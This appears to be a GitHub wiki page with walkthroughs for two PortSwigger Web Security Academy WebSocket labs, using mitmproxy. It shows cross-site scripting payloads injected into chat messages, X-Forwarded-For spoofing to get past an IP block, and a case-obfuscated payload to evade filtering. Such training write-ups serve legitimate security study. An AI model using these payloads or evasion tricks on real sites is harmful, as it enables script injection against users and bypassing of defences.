WebSockets - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Manipulating WebSocket messages to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets.
Chat messages that you submit are viewed by a support agent in real time.
To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.

  • Solution

    1. Go to Live chat and type a message. Before sending intercept the request.
    2. Edit websocket-message (ef), adding an onerror XSS 
      {"message":"<img src=x onerror=alert(1)>"}
    3. Forward all requests (A).

Practitioner lab:
Manipulating the WebSocket handshake to exploit vulnerabilities

  • Solution

    1. Go to live chat and try an XSS payload: 
      <img src=1 onerror='alert(1);'>
    2. System will detect attack. Trying X-Forwarded-For: 234 works.
    3. Set X-Forwarded-For header for everything request. 
      : set modify_headers /X-Forwarded-For/1234
    4. Trying out obfuscated XSS: 
      <img src=1 oNeRrOr=alert`1`;>

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️